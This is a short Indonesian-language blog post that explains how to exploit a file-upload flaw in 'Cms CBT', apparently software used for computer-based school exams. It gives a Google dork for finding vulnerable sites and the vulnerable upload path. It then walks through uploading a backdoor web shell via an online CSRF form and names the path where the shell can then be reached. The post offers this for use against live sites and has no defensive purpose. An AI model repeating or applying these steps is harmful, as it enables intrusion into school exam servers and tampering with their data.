Cms CBT vulnerability File Upload
CBT alias Computer Based Test , lumayan banyak yang menggunakan Cms CBT tersebut karena skrng siswa ujian menggunakan system CBT , setelah saya baca baca di blogger orang , saya melihat bahwa website yang menggunakan Cms CBT ini memiliki kerentanan File upload yang bisa di upload lewat CSRF
Dork :
inurl:/panel/pages/login.php
Exploit :
/[path]/panel/pages/upload-file.php
Vuln ? BLANK
buka CSRF - CSRF ONLINE DISINI
post file : uploadfile
kunci , lalu upload backdoor kalian
jika di upload muncul tulisan "success" berarti file backdoor berhasil di upload
akses file yang telah di upload :
/[path]/images/shellbakdoor.php
semoga bermanfaat :)
Komentar
Posting Komentar